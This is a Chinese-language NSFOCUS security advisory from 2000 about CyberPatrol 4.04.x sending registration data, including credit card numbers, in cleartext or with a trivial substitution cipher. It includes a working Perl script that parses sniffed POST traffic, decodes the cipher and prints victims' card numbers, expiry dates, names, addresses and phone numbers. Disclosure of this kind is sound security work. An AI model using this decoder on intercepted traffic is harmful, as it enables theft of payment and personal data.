安全研究

安全漏洞
CyberPatrol 注册不安全漏洞

发布日期:2000-11-24
更新日期:2000-11-24

受影响系统:

   Microsys CyberPatrol 4.04.005
   Microsys CyberPatrol 4.04.003
描述:

CyberPatrol 是流行的 web 访问限制软件,出自 Microsys。

在从客户端向 Microsys' backend (cybercentral.microsys.com)提交
登记信息的过程中,CyberPatrol 存在一个漏洞。这个漏洞使得远程攻击
者可以获取私人保密信息,包括信用卡。

客户端声明包括信用卡在内的所有信息在向 Microsys' backend 发送
前都已经被故意搅乱。嗅探的结果表明,除了信用卡号外的所有信息实
际上是以明文传送的。远程攻击者可以放一个嗅探器,获取保密的登记
信息。只有信用卡号例外,它被用替换算法保护起来。另外,这些信息
还可以通过检查防火墙代理的日志文件来获得。


<* 来源:Joey Maier (maierj@home.com) *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


#!/usr/bin/perl

$showline=0;
open(SNORT, "log");
LINE:while($line=<SNORT>){
  @field=split /\s/, $line;
  if($#field>0 && $#field<15){next LINE;}
  if(!($line=~/\w/)){
    $registerinfo=~s/\%20/ /g;
    $registerinfo=~s/\%40/@/g;
    ($junk, $registerinfo)=split /\.\.\.\./, $registerinfo;
    @array=split /\&/, $registerinfo;
    if($array[0]=~/EMAIL/){print "$array[0]\n";}

    if($array[1]=~/CARD/){print "CARD=";}
    @chararray=split //, $array[1];
    $arraylength=$#chararray;
    for($i=0; $i<$arraylength+1; ++$i){
      if($chararray[$i]=~/\%/){
        $checkchar="$chararray[$i]";
        $checkchar.="$chararray[$i+1]";
        $checkchar.="$chararray[$i+2]";
        $i=$i+2;
      } else {$checkchar="$chararray[$i]";}

      if($checkchar=~/z/){print "0";}
      elsif($checkchar=~/{/){print "1";}
      elsif($checkchar=~/x/){print "2";}
      elsif($checkchar=~/y/){print "3";}
      elsif($checkchar=~/\%7E/){print "4";}
      elsif($checkchar=~/\./){print "5";}
      elsif($checkchar=~/\|/){print "6";}
      elsif($checkchar=~/\}/){print "7";}
      elsif($checkchar=~/r/){print "8";}
      elsif($checkchar=~/s/){print "9";}
    }

    if($array[2]=~/EXP/){print "\n$array[2]\n";}
    if($array[3]=~/NAME/){print "$array[3]\n";}
    if($array[4]=~/ADDR1/){print "$array[4]\n";}
    if($array[5]=~/ADDR2/){print "$array[5]\n";}
    if($array[6]=~/CITY/){print "$array[6]\n";}
    if($array[7]=~/PHONE/){print "$array[7]\n\n\n";}

    $registerinfo="";
    $showline=0;
  }
  if ($line=~/POST/) {$showline=1}
  if ($showline eq 1) {
    ($junk, $line)=split / /, $line;
    chomp($line);
    $registerinfo.=$line;
  }
}



建议:

临时解决办法:

  NSFOCUS建议您在没有打补丁或升级版本前暂停使用,换用
  别的替代产品。


厂商补丁:

  暂无

浏览次数:5699
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客